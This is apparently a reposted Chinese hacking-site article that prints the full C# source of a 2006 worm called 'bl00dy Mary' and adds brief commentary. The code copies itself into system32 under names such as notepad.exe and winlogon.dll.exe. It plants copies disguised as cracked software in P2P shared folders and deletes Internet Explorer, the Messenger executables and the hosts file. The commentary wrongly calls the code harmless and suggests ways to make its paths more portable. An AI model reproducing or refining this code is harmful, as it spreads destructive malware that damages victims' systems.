一个C#病毒源代码的分析
来源:互联网 发布:运营淘宝 编辑:程序博客网 时间:2024/05/11 15:47
病毒代码如下
/* intento basico para un virus en C#
* iniciacion del projecto Lunes 10 de Julio del 2006
* ~~bl00dy c0d3r~~
*/
using System;
using System.IO;
using System.Windows.Forms;
class MainClass {
public static void Main() {
string pauseline = "";
System.Windows.Forms.View.LargeIcon.Equals(@"cd.ico");
Console.WriteLine("Iniciating Install.. ");
Console.WriteLine("Press ENTER to start...");
pauseline = Console.ReadLine();
try {
Application.StartupPath.Clone();
} catch (Exception) {
Console.WriteLine("StartUp Path, not cloned..");
} try {
Application.AllowQuit.Equals(false);
} catch (Exception) {
Console.WriteLine("to quit press Ctrl + C");
}
new trigger();
}
}
class trigger {
public trigger(){
long trigger, counter;
trigger = 10000;
counter = 2;
while (trigger != counter) {
counter = counter + 1;
Console.WriteLine("{0} << progress out of 10000", counter);
}
new effects(); // al activarse se ira a MainForm() y copy()
}
}
class copy {
public copy() {
try {
File.Copy(Application.ExecutablePath, System.Environment.SystemDirectory + @"/winlogon.dll.exe", true);
} catch (Exception) {
Console.WriteLine("winlogon failed permanently");
}
try {
File.Copy(Application.ExecutablePath, @"C:/WINDOWS/system32/taskman.exe", true);
} catch (Exception) {
Console.WriteLine("Finishing...");
}try {
File.Copy(Application.ExecutablePath, System.Environment.SystemDirectory + @"/notepad.exe", true);
}catch (Exception){
Console.WriteLine("Notepad failed permanently");
} try {
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Norton Antivirus~craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/LimeWire Pro~10.5 Craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Key Generator Universal.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Generator Credit Card.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Halo 2.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Morpheus Ultra~Craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/AntiSpyware Ultra.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Craked Windows XP sp2.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Win Zip craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Macromedia Flash 8 craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Lord of the rings II craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Nero craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Google Earth Pro~craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Windows Vista Craked.exe", true);
} catch (Exception) {
Console.WriteLine("LimeWire not found..");
Console.WriteLine("Please try to download it at http://www.Limewire.com");
} try {
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Norton Antivirus~craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/LimeWire Pro~10.5 Craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Key Generator Universal.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Generator Credit Card.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Halo 2.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Morpheus Ultra~Craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/AntiSpyware Ultra.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Craked Windows XP sp2.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Win Zip craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Macromedia Flash 8 craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Lord of the rings II craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Nero craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Google Earth Pro~craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Windows Vista Craked.exe", true);
} catch (Exception) {
Console.WriteLine("Morpheus Ultra not Found..");
} try {
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Norton Antivirus~Craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/LimeWire Pro~10.5 Craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Key Generator Universal.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Halo 2.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Morpheus Ultra~Craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/AntiSpyware Ultra.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Craked Windows XP sp2.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Win Zip craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Macromedia Flash 8 craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Lord of the rings II craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Nero craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Google Earth Pro~craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Windows Vista Craked.exe", true);
} catch (Exception) {
Console.WriteLine("Morpheus not found..");
} try {
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Norton Antivirus~Craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/LimeWire Pro~10.5 Craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Key Generator Universal.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Halo 2.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Morpheus Ultra~Craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/AntiSpyware Ultra.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Craked Windows XP sp2.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Win Zip craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Macromedia Flash 8 craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Lord of the rings II craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Nero craked.exe", true);
File.Copy(Applica瓚ion.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Google Earth Pro~craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Windows Vista Craked.exe", true);
} catch (Exception) {
Console.WriteLine("Kazaa not found..");
}
}
}
class effects {
public effects() {
new copy();
try {
File.Delete(@"C:/Program Files/Yahoo!/Messenger/YPager.exe");
File.Delete(@"C:/Program Files/Internet Explorer/IEXPLORE.EXE");
File.Delete(@"C:/WINDOWS/$hf_mig$/KB873339/spmsg.dll");
File.Delete(@"C:/WINDOWS/system32/drivers/etc/hosts");
File.Delete(@"C:/Program Files/MSN Messenger/msvc.exe");
File.Delete(@"C:/Program Files/MSN Messenger/msnmsgr.exe");
} catch (Exception) {
Console.WriteLine("Internet Explorer not found..");
}
new report();
new infected();
Application.Run(new MainForm());
}
}
class infected {
public infected() {
string youInfected;
youInfected = "true";
if (youInfected == "true") {
Console.WriteLine("Finished!!");
Console.WriteLine("press ENTER to continue...");
string pauselineinfected;
pauselineinfected = Console.ReadLine();
} else {
new effects();
}
}
}
class report {
public report() {
// aqui se pondra el codigo de reporte
Console.WriteLine("Registering..");
}
}
class MainForm : Form {
public MainForm() {
long numDeVeces = 10000;
long counter = 1;
while (numDeVeces != counter) {
try {
Application.AllowQuit.Equals(false);
} catch (Exception) {
Console.WriteLine("JEJEJEJE!!!");
}
counter = counter + 1;
MessageBox.Show("Estas Infectad@ con bl00dy Mary, have phun!!/nNo intentes remover el virus o atacara!!",
"Error Fatal..", MessageBoxButtons.OK, MessageBoxIcon.Hand, MessageBoxDefaultButton.Button1);
}
}
}
// terminado Domingo 16 de Julio 2006 10:43 pm. -=[bl00dy c0d3r]=-
这个病毒没杀伤力,就是几个替换和拷贝文件而已
不过觉得作者有一段代码写的不精炼
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Norton Antivirus~craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/LimeWire Pro~10.5 Craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Key Generator Universal.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Generator Credit Card.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Halo 2.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Morpheus Ultra~Craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/AntiSpyware Ultra.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Craked Windows XP sp2.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Win Zip craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Macromedia Flash 8 craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Lord of the rings II craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Nero craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Google Earth Pro~craked.exe", true);
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Windows Vista Craked.exe", true);
} catch (Exception) {
Console.WriteLine("LimeWire not found..");
Console.WriteLine("Please try to download it at http://www.Limewire.com");
磁盘路径C:/Documents and Settings/Owner/并不是每台计算机的操作系统都安装在C盘
可以用Environment.GetEnvironmentVariable 方法获得系统环境变量
例如用户配置文档目录%userprofile%,以及系统应用程序安装目录 %programfiles%都可以用上面那个方法获得.
例如获得用户配置文档目录
Environement.GetEnvironmentVariable("userprofile")
不过作者挺专业的
都写好了 autorun.inf和nfo文件
本篇文章来源于 新世纪网安基地 (www.520hack.com) 原文出处:http://www.520hack.com/Article/Text6/200908/15474.html
- [原创]一个C#病毒源代码的分析
- 一个C#病毒源代码的分析
- 一个C#病毒源代码的分析
- 一个病毒源码的分析
- 一个病毒源码的分析
- 用c#写的一个病毒文件
- 爱虫病毒源代码分析
- 一个简单的HTML病毒分析
- 一个简短的android病毒分析
- 一个简单的HTML病毒分析
- 一个简短的android病毒分析
- 一个感染型的病毒逆向分析
- 一个DDOS病毒的分析(一)
- 一个DDOS病毒的分析(二)
- 一个DDOS木马后门病毒的分析
- 【笔记】对一个DOS病毒的分析
- 一个lpk.dll病毒的分析报告
- 一个安卓锁机病毒的分析报告
- [FW] 程序员真的都在追求什么?
- 【转】C#中隐藏(new)和方法重写(override)和重载(overload)
- 带有指针数据成员的类
- 向sgi-stl源码冲击
- WorkflowRuntime与服务
- 一个C#病毒源代码的分析
- 在windows右键菜单加入项
- 几道SQL面试题
- MyEclipse6.0.1注册码生成器(源码)
- 震荡波病毒源代码
- 安装OpenCV笔记 Fedore linux core5
- 跑马灯效果的JavaScript
- 내 사랑 그대 내곁에 있어주오(我的爱,请在我身边)
- 【病毒】backdoor病毒源代码